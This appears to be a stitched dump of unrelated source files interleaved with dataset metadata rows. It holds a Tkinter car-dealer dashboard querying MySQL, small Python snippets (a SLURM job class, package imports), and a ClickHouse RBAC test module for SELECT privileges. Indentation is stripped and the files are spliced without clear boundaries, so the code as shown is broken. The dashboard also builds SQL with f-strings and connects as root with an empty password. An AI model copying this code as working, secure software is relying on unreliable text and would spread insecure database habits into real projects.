self.show_employees_button = Button(final_frame, text='SHOW EMPLOYEES ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=show_employees_button_clicked)
self.show_employees_button.pack()
self.add_employees_button = Button(final_frame, text='ADD EMPLOYEES ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=add_employees_button_clicked)
self.add_employees_button.pack()
self.update_employees_button = Button(final_frame, text='UPDATE EMPLOYEES', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=update_employees_button_clicked)
self.update_employees_button.pack()
self.delete_employees_button = Button(final_frame, text='DELETE EMPLOYEES', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=delete_employees_button_clicked)
self.delete_employees_button.pack()
self.welcome_label = Label(self.content_frame, text='WELCOME,', font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='white')
self.welcome_label.place(x=21, y=14)
self.name_label = Label(self.content_frame, text=fullname, anchor='w', width=25, font=('Arial Rounded MT', 13, 'bold'), bg='#292B37', fg='#BBBBBB')
self.name_label.place(x=118, y=14)
self.recent_sells_label = Label(self.content_frame, text='Recent sells,', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
self.recent_sells_label.place(x=21, y=65)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM sell ORDER BY Sell_ID DESC LIMIT 3'
my_cursor.execute(query)
sell_details = my_cursor.fetchall()
# sell_details = []
if len(sell_details) >= 1:
customer_id = sell_details[0][1]
product_name = sell_details[0][5]
selling_price = sell_details[0][3]
date_of_sell = sell_details[0][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=45, y=309)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=45, y=334)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=45, y=359)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=38, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=45, y=384)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=90, y=340)
if len(sell_details) >= 2:
customer_id = sell_details[1][1]
product_name = sell_details[1][5]
selling_price = sell_details[1][3]
date_of_sell = sell_details[1][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=179)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=204)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=229)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=254)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=210)
if len(sell_details) >= 3:
customer_id = sell_details[2][1]
product_name = sell_details[2][5]
selling_price = sell_details[2][3]
date_of_sell = sell_details[2][4]
query = f'SELECT full_name FROM customer WHERE Customer_ID = "{customer_id}"'
my_cursor.execute(query)
customer_name = my_cursor.fetchone()[0]
customer_name_label = Label(self.content_frame, text=f'Customer Name: {customer_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
customer_name_label.place(x=423, y=440)
product_name_label = Label(self.content_frame, text=f'Product Name: {product_name}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
product_name_label.place(x=423, y=465)
selling_price_label = Label(self.content_frame, text=f'Selling Price: {selling_price} $', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_price_label.place(x=423, y=490)
selling_date_label = Label(self.content_frame, text=f'Selling Date: {date_of_sell}', anchor='w', width=65, font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
selling_date_label.place(x=423, y=515)
else:
self.no_content = Label(self.content_frame, text=f'No contents available to show..', font=('Arial Rounded MT', 10, 'bold'), bg='#333640', fg='white')
self.no_content.place(x=550, y=470)
except Exception as e:
print(e)
self.root.mainloop()
# owner = tk.ThemedTk()
# owner.get_themes()
# owner.set_theme('black')
# EDO = Owner(owner, 'karim')
| 60.986203
| 298
| 0.561986
| 13,903
| 119,350
| 4.626412
| 0.035388
| 0.037313
| 0.056467
| 0.063525
| 0.904821
| 0.868192
| 0.837705
| 0.80504
| 0.781533
| 0.752274
| 0
| 0.063513
| 0.307415
| 119,350
| 1,957
| 299
| 60.986203
| 0.714626
| 0.005756
| 0
| 0.586883
| 0
| 0.006085
| 0.165755
| 0.011854
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033807
| false
| 0.043949
| 0.006085
| 0
| 0.040568
| 0.006761
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02cdaf73c401e6dc1e6281dcb00722bef22d7c78
| 93
|
py
|
Python
|
job/SLURM/Stampede.py
|
martintb/typyQ
|
889b4ea40c28ee76c452f8b2bc92f042e6be199d
|
[
"MIT"
] | null | null | null |
job/SLURM/Stampede.py
|
martintb/typyQ
|
889b4ea40c28ee76c452f8b2bc92f042e6be199d
|
[
"MIT"
] | null | null | null |
job/SLURM/Stampede.py
|
martintb/typyQ
|
889b4ea40c28ee76c452f8b2bc92f042e6be199d
|
[
"MIT"
] | null | null | null |
from SLURM import SLURMJob
class StampedeJob(SLURMJob):
#no specialization needed!
pass
| 15.5
| 28
| 0.784946
| 11
| 93
| 6.636364
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 93
| 5
| 29
| 18.6
| 0.935897
| 0.268817
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
02f27de27b9906f7b473a5d521d7b7acd80cfc7f
| 127
|
py
|
Python
|
3-SL-Training/presentation/magic.py
|
koltpython/python-workshops
|
8b7f5ce1bad0380d90a65a0e033d0acefd7ddcde
|
[
"MIT"
] | 3
|
2019-12-09T17:23:43.000Z
|
2021-12-15T09:10:44.000Z
|
3-SL-Training/presentation/magic.py
|
koltpython/python-workshops
|
8b7f5ce1bad0380d90a65a0e033d0acefd7ddcde
|
[
"MIT"
] | 1
|
2020-02-03T18:01:20.000Z
|
2020-02-03T18:27:43.000Z
|
3-SL-Training/presentation/magic.py
|
koltpython/python-workshops
|
8b7f5ce1bad0380d90a65a0e033d0acefd7ddcde
|
[
"MIT"
] | null | null | null |
if math.sqrt(villain.age * hero.age) < 10:
hero.age += 2
villain.age -= 1
else:
hero.age -= 2
villain.age += 1
| 18.142857
| 42
| 0.559055
| 21
| 127
| 3.380952
| 0.47619
| 0.422535
| 0.225352
| 0.422535
| 0.535211
| 0.535211
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 0.275591
| 127
| 6
| 43
| 21.166667
| 0.706522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02f8acf5fd36055b7c674a5f9bcb5272d8fa428e
| 135
|
py
|
Python
|
brainframe_qt/ui/resources/video_items/zones/__init__.py
|
aotuai/brainframe-qt
|
082cfd0694e569122ff7c63e56dd0ec4b62d5bac
|
[
"BSD-3-Clause"
] | 17
|
2021-02-11T18:19:22.000Z
|
2022-02-08T06:12:50.000Z
|
brainframe_qt/ui/resources/video_items/zones/__init__.py
|
aotuai/brainframe-qt
|
082cfd0694e569122ff7c63e56dd0ec4b62d5bac
|
[
"BSD-3-Clause"
] | 80
|
2021-02-11T08:27:31.000Z
|
2021-10-13T21:33:22.000Z
|
brainframe_qt/ui/resources/video_items/zones/__init__.py
|
aotuai/brainframe-qt
|
082cfd0694e569122ff7c63e56dd0ec4b62d5bac
|
[
"BSD-3-Clause"
] | 5
|
2021-02-12T09:51:34.000Z
|
2022-02-08T09:25:15.000Z
|
from .abstract_zone_item import AbstractZoneItem
from .zone_line_item import ZoneLineItem
from .zone_region_item import ZoneRegionItem
| 33.75
| 48
| 0.888889
| 18
| 135
| 6.333333
| 0.555556
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 135
| 3
| 49
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b88acf79bbdd8abba9a0bb51160ce4d7eb9ad45d
| 39
|
py
|
Python
|
python/doit/05/game/graphic/screen.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/doit/05/game/graphic/screen.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/doit/05/game/graphic/screen.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
def screen_test():
print("screen")
| 13
| 19
| 0.641026
| 5
| 39
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179487
| 39
| 2
| 20
| 19.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
b8bfc94cdb2c2e9a54dc01d1cf70e697b70142ca
| 177
|
py
|
Python
|
src/main.py
|
shuyangw/thumper-ai
|
d2aec405860d95b21023d247c5ead9810c26416e
|
[
"MIT"
] | 1
|
2022-03-28T19:55:55.000Z
|
2022-03-28T19:55:55.000Z
|
src/main.py
|
shuyangw/thumper-ai
|
d2aec405860d95b21023d247c5ead9810c26416e
|
[
"MIT"
] | null | null | null |
src/main.py
|
shuyangw/thumper-ai
|
d2aec405860d95b21023d247c5ead9810c26416e
|
[
"MIT"
] | null | null | null |
from deepq import init
from screen import get_window_rect, get_window_pixels
if __name__ == "__main__":
rect = get_window_rect()
print(rect)
get_window_pixels(rect)
| 25.285714
| 53
| 0.757062
| 26
| 177
| 4.538462
| 0.5
| 0.305085
| 0.330508
| 0.322034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169492
| 177
| 7
| 54
| 25.285714
| 0.802721
| 0
| 0
| 0
| 0
| 0
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b22bf9a285ffee715778b5565871ebf1218b7192
| 34
|
py
|
Python
|
gmailIt/__init__.py
|
kid-on-github/gmailIt
|
d3dfadb03945fce9182a4dbbba3def0f1de8f4f7
|
[
"MIT"
] | null | null | null |
gmailIt/__init__.py
|
kid-on-github/gmailIt
|
d3dfadb03945fce9182a4dbbba3def0f1de8f4f7
|
[
"MIT"
] | null | null | null |
gmailIt/__init__.py
|
kid-on-github/gmailIt
|
d3dfadb03945fce9182a4dbbba3def0f1de8f4f7
|
[
"MIT"
] | null | null | null |
from gmailIt.gmailIt import Email
| 17
| 33
| 0.852941
| 5
| 34
| 5.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b2432405f85fd465a29747660167af2b0febe9c9
| 358
|
py
|
Python
|
src/bindings/python/src/openvino/runtime/utils/__init__.py
|
kurylo/openvino
|
4da0941cd2e8f9829875e60df73d3cd01f820b9c
|
[
"Apache-2.0"
] | 2
|
2021-12-14T15:27:46.000Z
|
2021-12-14T15:34:16.000Z
|
src/bindings/python/src/openvino/runtime/utils/__init__.py
|
kurylo/openvino
|
4da0941cd2e8f9829875e60df73d3cd01f820b9c
|
[
"Apache-2.0"
] | 33
|
2021-09-23T04:14:30.000Z
|
2022-01-24T13:21:32.000Z
|
src/bindings/python/src/openvino/runtime/utils/__init__.py
|
kurylo/openvino
|
4da0941cd2e8f9829875e60df73d3cd01f820b9c
|
[
"Apache-2.0"
] | 11
|
2021-11-09T00:51:40.000Z
|
2021-11-10T12:04:16.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""Generic utilities. Factor related functions out to separate files."""
from openvino.pyopenvino.util import numpy_to_c
from openvino.pyopenvino.util import clone_model
from openvino.pyopenvino.util import get_constant_from_source, replace_node, replace_output_update_name
| 39.777778
| 103
| 0.832402
| 51
| 358
| 5.647059
| 0.72549
| 0.125
| 0.229167
| 0.270833
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030864
| 0.094972
| 358
| 8
| 104
| 44.75
| 0.858025
| 0.405028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a22fbcbd2774a5e2dcb37f384d6ad1281d75b45d
| 44
|
py
|
Python
|
numba/dppl/ocl/__init__.py
|
DrTodd13/numba
|
de35af55d295f1677cca76646691d8c51c79d3cf
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/ocl/__init__.py
|
DrTodd13/numba
|
de35af55d295f1677cca76646691d8c51c79d3cf
|
[
"BSD-2-Clause"
] | null | null | null |
numba/dppl/ocl/__init__.py
|
DrTodd13/numba
|
de35af55d295f1677cca76646691d8c51c79d3cf
|
[
"BSD-2-Clause"
] | null | null | null |
from .atomics import atomic_support_present
| 22
| 43
| 0.886364
| 6
| 44
| 6.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 44
| 1
| 44
| 44
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a236d65b713cc258b23a68cea03682d9f0c4eb86
| 31
|
py
|
Python
|
pyattck/preattck/__init__.py
|
timb-machine/pyattck
|
1636c9191a92fa28e2cc03f8f04b85195070f0b9
|
[
"MIT"
] | null | null | null |
pyattck/preattck/__init__.py
|
timb-machine/pyattck
|
1636c9191a92fa28e2cc03f8f04b85195070f0b9
|
[
"MIT"
] | null | null | null |
pyattck/preattck/__init__.py
|
timb-machine/pyattck
|
1636c9191a92fa28e2cc03f8f04b85195070f0b9
|
[
"MIT"
] | null | null | null |
from .preattck import PreAttck
| 15.5
| 30
| 0.83871
| 4
| 31
| 6.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a2425692b57e3f9926f2a05af100b8b74a2bbad1
| 106
|
py
|
Python
|
riverrunner/__init__.py
|
lukeWaninger/RiverRunner
|
db977d9eccbc711b15678af3f94f1891375fb001
|
[
"MIT"
] | null | null | null |
riverrunner/__init__.py
|
lukeWaninger/RiverRunner
|
db977d9eccbc711b15678af3f94f1891375fb001
|
[
"MIT"
] | null | null | null |
riverrunner/__init__.py
|
lukeWaninger/RiverRunner
|
db977d9eccbc711b15678af3f94f1891375fb001
|
[
"MIT"
] | null | null | null |
from .context import *
from .repository import *
from .daily import *
from .continuous_retrieval import *
| 21.2
| 35
| 0.773585
| 13
| 106
| 6.230769
| 0.538462
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 106
| 4
| 36
| 26.5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a25a2f6cedccff00dbfcc1c81ee7bb27e7f680e1
| 87
|
py
|
Python
|
built_in_functions/help_function.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
built_in_functions/help_function.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
built_in_functions/help_function.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
# help(len)
# help(print)
# help("len")
# help(str)
# help(list)
# help("hi".replace)
| 10.875
| 20
| 0.586207
| 13
| 87
| 3.923077
| 0.538462
| 0.27451
| 0.431373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149425
| 87
| 7
| 21
| 12.428571
| 0.689189
| 0.83908
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a293b37b625f98887b548ea19cb7b52329e65b72
| 25
|
py
|
Python
|
doitlater/__init__.py
|
evalkaz/doitlater
|
c133c5bd5c2e295a72f84456bd3edd9ca21d1475
|
[
"MIT"
] | null | null | null |
doitlater/__init__.py
|
evalkaz/doitlater
|
c133c5bd5c2e295a72f84456bd3edd9ca21d1475
|
[
"MIT"
] | null | null | null |
doitlater/__init__.py
|
evalkaz/doitlater
|
c133c5bd5c2e295a72f84456bd3edd9ca21d1475
|
[
"MIT"
] | null | null | null |
from .later import Later
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a2a1f7e490dcbf14c0d6ac61bbffcc87f05e9c71
| 18
|
py
|
Python
|
textattack/models/entailment/__init__.py
|
fighting41love/TextAttack
|
24e48f0022dc3a7bdcd5cbb3430f1c72cfcb522d
|
[
"MIT"
] | 2
|
2020-07-08T08:55:37.000Z
|
2020-09-03T00:57:38.000Z
|
textattack/models/entailment/__init__.py
|
SatoshiRobatoFujimoto/TextAttack
|
a809a9bddddff9f41750949e26edde26c8af6cfa
|
[
"MIT"
] | null | null | null |
textattack/models/entailment/__init__.py
|
SatoshiRobatoFujimoto/TextAttack
|
a809a9bddddff9f41750949e26edde26c8af6cfa
|
[
"MIT"
] | null | null | null |
from . import bert
| 18
| 18
| 0.777778
| 3
| 18
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 18
| 1
| 18
| 18
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a2d3092f1c3c3a27698cdfae61ccb8ab3f468427
| 26,409
|
py
|
Python
|
tests/testflows/rbac/tests/privileges/select.py
|
lizhichao/ClickHouse
|
3f5dc37095ccca18de490fab162d6e3cb99756aa
|
[
"Apache-2.0"
] | 1
|
2020-10-19T06:32:10.000Z
|
2020-10-19T06:32:10.000Z
|
tests/testflows/rbac/tests/privileges/select.py
|
lizhichao/ClickHouse
|
3f5dc37095ccca18de490fab162d6e3cb99756aa
|
[
"Apache-2.0"
] | null | null | null |
tests/testflows/rbac/tests/privileges/select.py
|
lizhichao/ClickHouse
|
3f5dc37095ccca18de490fab162d6e3cb99756aa
|
[
"Apache-2.0"
] | null | null | null |
from contextlib import contextmanager
import json
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
import rbac.tests.errors as errors
table_types = {
"MergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = MergeTree(d, (a, b), 111)",
"ReplacingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = ReplacingMergeTree(d, (a, b), 111)",
"SummingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = SummingMergeTree(d, (a, b), 111)",
"AggregatingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = AggregatingMergeTree(d, (a, b), 111)",
"CollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = CollapsingMergeTree(d, (a, b), 111, y);",
"VersionedCollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32, version UInt64, sign Int8, INDEX a (b * y, d) TYPE minmax GRANULARITY 3) ENGINE = VersionedCollapsingMergeTree(sign, version) ORDER BY tuple()",
"GraphiteMergeTree": "CREATE TABLE {name} (key UInt32, Path String, Time DateTime, d Date, a String, b UInt8, x String, y Int8, z UInt32, Value Float64, Version UInt32, col UInt64, INDEX a (key * Value, Time) TYPE minmax GRANULARITY 3) ENGINE = GraphiteMergeTree('graphite_rollup_example') ORDER BY tuple()"
}
table_requirements ={
"MergeTree": RQ_SRS_006_RBAC_Privileges_Select_MergeTree("1.0"),
"ReplacingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_ReplacingMergeTree("1.0"),
"SummingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_SummingMergeTree("1.0"),
"AggregatingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_AggregatingMergeTree("1.0"),
"CollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_CollapsingMergeTree("1.0"),
"VersionedCollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Select_VersionedCollapsingMergeTree("1.0"),
"GraphiteMergeTree": RQ_SRS_006_RBAC_Privileges_Select_GraphiteMergeTree("1.0"),
}
@contextmanager
def table(node, name, table_type="MergeTree"):
try:
with Given(f"I have a {table_type} table"):
node.query(table_types[table_type].format(name=name))
yield
finally:
with Finally("I drop the table"):
node.query(f"DROP TABLE IF EXISTS {name}")
@contextmanager
def user(node, name):
try:
with Given("I have a user"):
node.query(f"CREATE USER OR REPLACE {name}")
yield
finally:
with Finally("I drop the user"):
node.query(f"DROP USER IF EXISTS {name}")
@contextmanager
def role(node, role):
try:
with Given("I have a role"):
node.query(f"CREATE ROLE OR REPLACE {role}")
yield
finally:
with Finally("I drop the role"):
node.query(f"DROP ROLE IF EXISTS {role}")
@TestScenario
def without_privilege(self, table_type, node=None):
"""Check that user without select privilege on a table is not able to select on that table.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I run SELECT without privilege"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("SELECT * FROM merge_tree", settings = [("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_Grant("1.0"),
)
def user_with_privilege(self, table_type, node=None):
"""Check that user can select from a table on which they have select privilege.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with Given("I have some data inserted into table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')")
with user(node, "user88"):
pass
with user(node, "user0"):
with When("I grant privilege"):
node.query("GRANT SELECT ON merge_tree TO user0")
with Then("I verify SELECT command"):
user_select = node.query("SELECT d FROM merge_tree", settings = [("user","user0")])
default = node.query("SELECT d FROM merge_tree")
assert user_select.output == default.output, error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Select_Revoke("1.0"),
)
